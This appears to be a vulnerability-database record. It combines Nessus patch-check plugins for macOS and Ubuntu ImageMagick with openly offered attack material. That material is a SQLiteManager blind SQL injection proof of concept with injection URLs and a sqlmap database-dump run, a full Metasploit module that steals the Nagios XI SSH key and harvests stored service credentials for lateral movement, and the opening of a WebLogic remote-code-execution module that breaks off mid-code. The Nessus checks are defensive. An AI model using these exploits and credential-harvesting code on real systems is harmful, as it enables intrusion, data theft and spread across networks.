\"CVE-2019-6211\",\n \"CVE-2019-6213\",\n \"CVE-2019-6214\",\n \"CVE-2019-6218\",\n \"CVE-2019-6219\",\n \"CVE-2019-6220\",\n \"CVE-2019-6221\",\n \"CVE-2019-6224\",\n \"CVE-2019-6225\",\n \"CVE-2019-6230\",\n \"CVE-2019-6231\",\n \"CVE-2019-6235\"\n );\n script_bugtraq_id(106323, 106693, 106694);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-1-22-2\");\n\n script_name(english:\"macOS 10.14.x < 10.14.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is\n10.14.x prior to 10.14.3. It is, therefore, affected by multiple\nvulnerabilities related to the following components:\n\n - AppleKeyStore\n - Bluetooth\n - Core Media\n - CoreAnimation\n - FaceTime\n - IOKit\n - Kernel\n - libxpc\n - Natural Language Processing\n - QuartzCore\n - SQLite\n - WebRTC\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209446\");\n # https://lists.apple.com/archives/security-announce/2019/Jan/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a77b9bea\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6218\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nfix = \"10.14.3\";\nminver = \"10.14\";\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\n\nif (ver_compare(ver:version, minver:minver, fix:fix, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:34:49", "bulletinFamily": "scanner", "description": "Due to a large number of issues discovered in GhostScript that prevent\nit from being used by ImageMagick safely, this update includes a\ndefault policy change that disables support for the Postscript and PDF\nformats in ImageMagick. This policy can be overridden if necessary by\nusing an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in\nImageMagick when handling certain images. An attacker could use this\nto cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing PNG\nimages. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the\nfix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for\nCVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3785-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117935", "published": "2018-10-05T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : imagemagick vulnerabilities (USN-3785-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3785-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117935);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13144\", \"CVE-2018-14434\", \"CVE-2018-14435\", \"CVE-2018-14436\", \"CVE-2018-14437\", \"CVE-2018-14551\", \"CVE-2018-16323\", \"CVE-2018-16640\", \"CVE-2018-16642\", \"CVE-2018-16643\", \"CVE-2018-16644\", \"CVE-2018-16645\", \"CVE-2018-16749\", \"CVE-2018-16750\");\n script_xref(name:\"USN\", value:\"3785-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : imagemagick vulnerabilities (USN-3785-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Due to a large number of issues discovered in GhostScript that prevent\nit from being used by ImageMagick safely, this update includes a\ndefault policy change that disables support for the Postscript and PDF\nformats in ImageMagick. This policy can be overridden if necessary by\nusing an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in\nImageMagick when handling certain images. An attacker could use this\nto cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing PNG\nimages. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the\nfix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for\nCVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3785-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-5v5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-3-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagick++5\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5-extra\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2-extra\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"imagemagick\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagick++-6.q16-7\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagickcore-6.q16-3\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagickcore-6.q16-3-extra\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"imagemagick / imagemagick-6.q16 / libmagick++-6.q16-5v5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-04T20:03:02", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-28T00:00:00", "published": "2019-08-28T00:00:00", "id": "1337DAY-ID-33164", "href": "https://0day.today/exploit/description/33164", "title": "SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection Vulnerability", "type": "zdt", "sourceData": "<!--\r\n# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://www.sqlitemanager.org/\r\n# Software Link: http://www.sqlitemanager.org/\r\n# Version: SQLiteManager 1.2.0 (and 1.2.4)\r\n# Tested on: All\r\n# CVE : CVE-2019-9083\r\n# Category: webapps\r\n\r\n\r\n1. Description\r\n\r\nSQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php\r\ndbsel parameter. NOTE: This product is discontinued.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nDetect:\r\nhttp://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072\r\nhttp://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070\r\n\r\nSave the next post in a file: sqli.txt\r\n\r\nPOST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1\r\nContent-Length: 191\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nCookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;\r\nSQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;\r\nSQLiteManager_fullText=0; SQLiteManager_HTMLon=0\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;\r\nTrident/5.0)\r\n\r\naction=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1\r\n\r\n$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all\r\n\r\n[11:58:27] [INFO] resuming back-end DBMS 'sqlite'\r\n[11:58:27] [INFO] testing connection to the target URL\r\nsqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: dbsel (GET)\r\n Type: boolean-based blind\r\n Title: OR boolean-based blind - WHERE or HAVING clause\r\n Payload: dbsel=-4019 OR 7689=7689\r\n---\r\n[11:58:27] [INFO] the back-end DBMS is SQLite\r\nweb server operating system: Windows\r\nweb application technology: PHP X.X.X, Apache 2.X.X\r\nback-end DBMS: SQLite\r\n[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases\r\nnow\r\n[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'\r\n[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'\r\n[11:58:27] [WARNING] reflective value(s) found and filtering out\r\n[11:58:27] [WARNING] running in a single-thread mode. Please consider usage\r\nof o\r\nption '--threads' for faster data retrieval\r\n[11:58:27] [INFO] retrieved: 5\r\n[11:58:27] [INFO] retrieved: database\r\n[11:58:28] [INFO] retrieved: user_function\r\n[11:58:30] [INFO] retrieved: attachment\r\n[11:58:31] [INFO] retrieved: groupes\r\n[11:58:32] [INFO] retrieved: users\r\n.....\r\n.....\r\n.....\r\n\r\n\r\n3. Solution:\r\n\r\nThe product is discontinued. Update to last version.\r\n-->\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33164"}], "metasploit": [{"lastseen": "2019-11-27T18:40:05", "bulletinFamily": "exploit", "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials, creating opportunities for lateral movement.\n", "modified": "2019-10-10T21:57:49", "published": "2019-07-27T17:22:58", "id": "MSF:POST/LINUX/GATHER/ENUM_NAGIOS_XI", "href": "", "type": "metasploit", "title": "Nagios XI Enumeration", "sourceData": " ##\n # This module requires Metasploit: https://metasploit.com/download\n # Current source: https://github.com/rapid7/metasploit-framework\n ##\n\n class MetasploitModule < Msf::Post\n include Msf::Post::Linux::System\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Nagios XI Enumeration',\n 'Description' => %q{\n NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cale Smith', # @0xC413\n ],\n 'DisclosureDate' => 'Apr 17 2018',\n 'Platform' => 'linux',\n 'SessionTypes' => ['shell', 'meterpreter'],\n }\n ))\n register_options([\n OptString.new('DB_ROOT_PWD', [true, 'Password for DB root user, an option if they change this', 'nagiosxi' ])\n ])\n end\n\n # save found creds in the MSF DB for easy use\n def report_obj(cred, login)#, login)\n return if cred.nil? || login.nil?\n credential_data = {\n origin_type: :session,\n post_reference_name: self.fullname,\n session_id: session_db_id,\n workspace_id: myworkspace_id,\n\n }.merge(cred)\n credential_core = create_credential(credential_data)\n\n login_data = {\n core: credential_core,\n workspace_id: myworkspace_id\n }.merge(login)\n\n create_credential_login(login_data)\n end\n\n #parse out domain realm for windows services\n def parse_realm(username)\n userealm=username.split('/')\n\n if userealm.count>1\n realm = userealm[0]\n username = userealm[1]\n\n credential_data={\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: realm,\n username: username\n }\n else\n credential_data={\n username: username\n }\n\n end\n\n return credential_data\n end\n\n def run\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n @creds = []\n @ssh_keys = []\n\n #get nagios SSH private key\n id_rsa_path = '/home/nagios/.ssh/id_rsa'\n if file?(id_rsa_path)\n print_good('Attempting to grab Nagios SSH key')\n ssh_key = read_file(id_rsa_path)\n ssh_key_loot = store_loot(\n 'nagios_ssh_priv_key',\n 'text/plain',\n session,\n ssh_key,\n nil\n )\n print_status(\"Nagios SSH key stored in #{ssh_key_loot}\")\n else\n print_status('No SSH key found')\n end\n\n print_status('Attempting to dump Nagios DB')\n db_dump_file = \"/tmp/#{Rex::Text.rand_text_alpha(6)}\"\n\n sql_query = %Q|mysql -u root -p#{datastore['DB_ROOT_PWD']} -e \"|\n sql_query << %Q|SELECT nagios_services.check_command_object_id, nagios_hosts.address, REPLACE(nagios_services.check_command_args,'\\\\\"','%22') FROM nagios.nagios_hosts |\n sql_query << %Q|INNER JOIN nagios.nagios_services on nagios_hosts.host_object_id=nagios_services.host_object_id |\n sql_query << %Q|INNER JOIN nagios.nagios_commands on nagios_commands.object_id = nagios_services.check_command_object_id |\n sql_query << %Q|WHERE nagios_services.check_command_object_id!=89 |\n sql_query << %Q|ORDER BY nagios_services.check_command_object_id |\n sql_query << %Q|INTO OUTFILE '#{db_dump_file}' FIELDS TERMINATED BY ',' ENCLOSED BY '\\\\\"' LINES TERMINATED BY '\\\\n' ;\"|\n\n out = cmd_exec(sql_query)\n if out.match(/error/i)\n print_error(\"Could not get DB contents: #{out.gsub(/\\n/, ' ')}\")\n return\n else\n db_dump = read_file(db_dump_file)\n print_good('Nagios DB dump successful')\n # store raw db results, there is likely good stuff in here that we don't parse out\n db_loot = store_loot(\n 'nagiosxi_raw_db_dump',\n 'text/plain',\n session,\n db_dump,\n nil\n )\n print_status(\"Raw Nagios DB dump #{db_loot}\")\n print_status(\"Look through the DB dump manually. There could be\\ some good loot we didn't parse out.\")\n end\n\n CSV.parse(db_dump) do |row|\n case row[0]\n when \"110\" #WMI\n host = row[1]\n creds = row[2].split('!')\n username = creds[0].match(/'(.*?)'/)[1]\n password = creds[1].match(/'(.*?)'/)[1]\n\n user_credential_data = parse_realm(username)\n\n credential_data = {\n private_data: password,\n private_type: :password,\n }.merge(user_credential_data)\n\n login_data = {\n address: host,\n port: 135,\n service_name: 'WMI',\n protocol: 'tcp',\n }\n\n when \"59\" #SSH\n host = row[1]\n\n credential_data = {\n username: 'nagios',\n private_data: ssh_key,\n private_type: :ssh_key\n }\n\n login_data = {\n address: host,\n port: 22,\n service_name: 'SSH',\n protocol: 'tcp',\n }\n\n when \"25\" #FTP\n host = row[1]\n creds = row[2].split('!')\n username = creds[0]\n password = creds[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 21,\n service_name: 'FTP',\n protocol: 'tcp',\n }\n\n when \"67\" #MYSQL\n host = row[1]\n username=row[2].match(/--username=(.*?)\\s/)[1]\n password=row[2].match(/--password=%22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 3306,\n service_name: 'MySQL',\n protocol: 'tcp',\n }\n\n when \"66\" #MSSQL\n host = row[1]\n username=row[2].match(/-U '(.*?)'/)[1]\n password=row[2].match(/-P '(.*?)'/)[1]\n\n user_credential_data = parse_realm(username)\n credential_data = {\n private_data: password,\n private_type: :password,\n }.merge(user_credential_data)\n\n login_data = {\n address: host,\n port: 1433,\n service_name: 'MSSQL',\n protocol: 'tcp',\n }\n\n when \"76\" #POSTGRES\n host = row[1]\n username=row[2].match(/--dbuser=(.*?)\\s/)[1]\n password=row[2].match(/--dbpass=%22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 5432,\n service_name: 'PostgreSQL',\n protocol: 'tcp',\n }\n\n when \"85\" #SNMP\n host = row[1]\n creds = row[2].split('!')\n password = ' '\n username = creds[0]\n port = 161\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 161,\n service_name: 'SNMP',\n protocol: 'udp',\n }\n\n when \"88\" #LDAP\n host = row[1]\n username = row[2].match(/-D %22(.*?)%22/)[1]\n password = row[2].match(/-P %22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 389,\n service_name: 'LDAP',\n protocol: 'tcp',\n }\n else\n #base case\n end\n unless credential_data.nil? || login_data.nil?\n report_obj(credential_data, login_data)\n end\n end\n\n\n print_status(\"Run 'creds' to see credentials loaded into the MSF DB\")\n\n #cleanup db dump\n register_file_for_cleanup(db_dump_file)\n end\n end\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/enum_nagios_xi.rb"}, {"lastseen": "2019-11-30T10:27:56", "bulletinFamily": "exploit", "description": "This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a \"oats\" account that you could log in with, which grants you administrator access.\n", "modified": "2019-05-24T15:06:47", "published": "2019-05-10T18:27:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',\n 'Description' => %q{\n This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Used the trick and told me about it\n 'sinn3r' # Metasploit module\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'WebLogic Server Administration Console 12 or prior', { } ]\n ],\n 'References' =>\n [\n # The CVE description matches what this exploit is doing, but it was for version\n # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.\n # ['CVE', '2007-2699']\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'Notes' =>\n {\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 13 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),\n OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),\n OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])\n ])\n\n register_advanced_options(\n [\n OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\\\OracleATS'])\n ])\n end\n\n class LoginSpec\n attr_accessor :admin_console_session\n end\n\n def login_spec\n @login_spec ||= LoginSpec.new\n 